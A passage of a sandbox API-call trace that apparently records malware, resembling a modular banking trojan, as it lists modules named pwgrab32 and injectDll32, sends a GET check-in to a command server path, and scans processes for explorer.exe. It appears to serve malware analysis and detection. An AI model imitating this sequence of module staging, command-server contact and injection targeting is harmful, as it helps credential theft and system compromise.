	[0232.787] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5992b680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5992b680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x599517e0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x90bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32", cAlternateFileName="INJECT~1")) returned 1
	[0232.787] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b75c0
	[0232.787] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x234f30
	[0232.787] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5b9e6500, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5ceba580, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ceba580, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32_configs", cAlternateFileName="INJECT~2")) returned 1
	[0232.787] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68a088a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x68a088a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x68a088a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x4ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32", cAlternateFileName="NETWOR~1")) returned 1
	[0232.787] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22b75c0, Size=0x10) returned 0x22b7638
	[0232.787] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x22b6298
	[0232.787] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x69f02a80, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x69f02a80, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x69f02a80, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32_configs", cAlternateFileName="NETWOR~2")) returned 1
	[0232.787] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e5ad7a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6e5ad7a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6e5d3900, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x48b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32", cAlternateFileName="")) returned 1
	[0232.787] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22b7638, Size=0x10) returned 0x22b75c0
	[0232.787] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x22caa30
	[0232.787] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6eff1680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6eff1680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6eff1680, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32_configs", cAlternateFileName="PSFIN3~1")) returned 1
	[0232.787] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5edac380, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5edac380, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ee1e7a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x111360, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32", cAlternateFileName="")) returned 1
	[0232.787] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22b75c0, Size=0x10) returned 0x22b7638
	[0232.787] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2738590
	[0232.787] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60507b60, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x60507b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x60507b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32_configs", cAlternateFileName="PWGRAB~1")) returned 1
	[0232.787] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70f7ba00, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70f7ba00, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x28e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="shareDll32", cAlternateFileName="SHARED~1")) returned 1
	[0232.787] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22b7638, Size=0x20) returned 0x2778870
	[0232.787] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26e438
	[0232.787] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 1
	[0232.787] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2778870, Size=0x20) returned 0x27786b8
	[0232.787] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0232.787] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 0
	[0232.787] GetLastError () returned 0x12
	[0232.787] FindClose (in: hFindFile=0x22b6a40 | out: hFindFile=0x22b6a40) returned 1
	[0232.787] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32") returned="injectDll32"
	[0232.787] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b8780
	[0232.787] GetFullPathNameW (in: lpFileName="Data\\injectDll32", nBufferLength=0x105, lpBuffer=0x26b8780, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32", lpFilePart=0x0) returned 0x41
	[0232.788] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d8
	[0232.788] GetFileTime (in: hFile=0x5d8, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x599517e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0232.788] CloseHandle (hObject=0x5d8) returned 1
	[0232.788] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x72984aa0, dwHighDateTime=0x1d50a6a)) 
	[0232.788] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0232.788] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32") returned="networkDll32"
	[0232.788] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b8780
	[0232.788] GetFullPathNameW (in: lpFileName="Data\\networkDll32", nBufferLength=0x105, lpBuffer=0x26b8780, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32", lpFilePart=0x0) returned 0x42
	[0232.788] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d8
	[0232.788] GetFileTime (in: hFile=0x5d8, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0232.788] CloseHandle (hObject=0x5d8) returned 1
	[0232.788] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x72984aa0, dwHighDateTime=0x1d50a6a)) 
	[0232.788] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0232.788] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32") returned="psfin32"
	[0232.788] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b8780
	[0232.788] GetFullPathNameW (in: lpFileName="Data\\psfin32", nBufferLength=0x105, lpBuffer=0x26b8780, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32", lpFilePart=0x0) returned 0x3d
	[0232.788] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d8
	[0232.788] GetFileTime (in: hFile=0x5d8, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x6e5d3900, dwHighDateTime=0x1d50a6a)) returned 1
	[0232.788] CloseHandle (hObject=0x5d8) returned 1
	[0232.788] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x72984aa0, dwHighDateTime=0x1d50a6a)) 
	[0232.789] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0232.789] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32") returned="pwgrab32"
	[0232.789] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b8780
	[0232.789] GetFullPathNameW (in: lpFileName="Data\\pwgrab32", nBufferLength=0x105, lpBuffer=0x26b8780, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32", lpFilePart=0x0) returned 0x3e
	[0232.789] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d8
	[0232.789] GetFileTime (in: hFile=0x5d8, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x5ee1e7a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0232.789] CloseHandle (hObject=0x5d8) returned 1
	[0232.789] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x72984aa0, dwHighDateTime=0x1d50a6a)) 
	[0232.789] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0232.789] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32") returned="shareDll32"
	[0232.789] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b8780
	[0232.789] GetFullPathNameW (in: lpFileName="Data\\shareDll32", nBufferLength=0x105, lpBuffer=0x26b8780, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32", lpFilePart=0x0) returned 0x40
	[0232.789] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\sharedll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d8
	[0232.789] GetFileTime (in: hFile=0x5d8, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x70fa1b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0232.789] CloseHandle (hObject=0x5d8) returned 1
	[0232.789] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x72984aa0, dwHighDateTime=0x1d50a6a)) 
	[0232.789] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0232.789] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32") returned="systeminfo32"
	[0232.789] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b8780
	[0232.789] GetFullPathNameW (in: lpFileName="Data\\systeminfo32", nBufferLength=0x105, lpBuffer=0x26b8780, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32", lpFilePart=0x0) returned 0x42
	[0232.789] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\systeminfo32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d8
	[0232.790] GetFileTime (in: hFile=0x5d8, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x46215b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0232.790] CloseHandle (hObject=0x5d8) returned 1
	[0232.790] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x72984aa0, dwHighDateTime=0x1d50a6a)) 
	[0232.790] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0232.790] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b64b0) returned 1
	[0232.790] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26e438) returned 1
	[0232.790] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2738590) returned 1
	[0232.790] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22caa30) returned 1
	[0232.790] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b6298) returned 1
	[0232.790] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x234f30) returned 1
	[0232.790] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27786b8) returned 1
	[0232.790] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0232.790] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0232.790] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0232.790] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0232.790] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1/FVrARl8ToBVp5Rl5OewG/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0232.790] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128bf0, dwBufferLength=0x4) returned 1
	[0232.790] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0234.076] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0234.076] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128be0, lpdwBufferLength=0x128bdc, lpdwIndex=0x0 | out: lpBuffer=0x128be0*, lpdwBufferLength=0x128bdc*=0x4, lpdwIndex=0x0) returned 1
	[0234.076] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x3) returned 1
	[0234.076] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad240
	[0234.076] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x22ad240, dwNumberOfBytesToRead=0x3, lpdwNumberOfBytesRead=0x128bdc | out: lpBuffer=0x22ad240*, lpdwNumberOfBytesRead=0x128bdc*=0x3) returned 1
	[0234.077] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x0) returned 1
	[0234.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ad240, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3
	[0234.077] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad348
	[0234.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ad240, cbMultiByte=3, lpWideCharStr=0x22ad348, cchWideChar=3 | out: lpWideCharStr="/1/") returned 3
	[0234.077] StrStrIW (lpFirst="/1/", lpSrch="/") returned="/1/"
	[0234.077] StrStrIW (lpFirst="1/", lpSrch="/") returned="/"
	[0234.077] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2d0
	[0234.077] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad378
	[0234.077] lstrcpynW (in: lpString1=0x22ad378, lpString2="1/", iMaxLength=2 | out: lpString1="1") returned="1"
	[0234.077] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b76b0) returned 1
	[0234.077] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad348) returned 1
	[0234.077] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2d0) returned 1
	[0234.077] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad240) returned 1
	[0234.077] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5f8
	[0234.080] Process32FirstW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0234.080] lstrcmpW (lpString1="explorer.exe", lpString2="[System Process]") returned 1
	[0234.080] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0234.081] lstrcmpW (lpString1="explorer.exe", lpString2="System") returned -1
	[0234.081] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0234.082] lstrcmpW (lpString1="explorer.exe", lpString2="smss.exe") returned -1
	[0234.082] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0234.083] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0234.083] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0234.084] lstrcmpW (lpString1="explorer.exe", lpString2="wininit.exe") returned -1
	[0234.084] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0234.085] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0234.085] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0234.086] lstrcmpW (lpString1="explorer.exe", lpString2="winlogon.exe") returned -1
	[0234.086] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0234.087] lstrcmpW (lpString1="explorer.exe", lpString2="services.exe") returned -1
	[0234.087] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0234.087] lstrcmpW (lpString1="explorer.exe", lpString2="lsass.exe") returned -1
	[0234.087] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0234.088] lstrcmpW (lpString1="explorer.exe", lpString2="lsm.exe") returned -1
	[0234.088] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.089] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.089] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
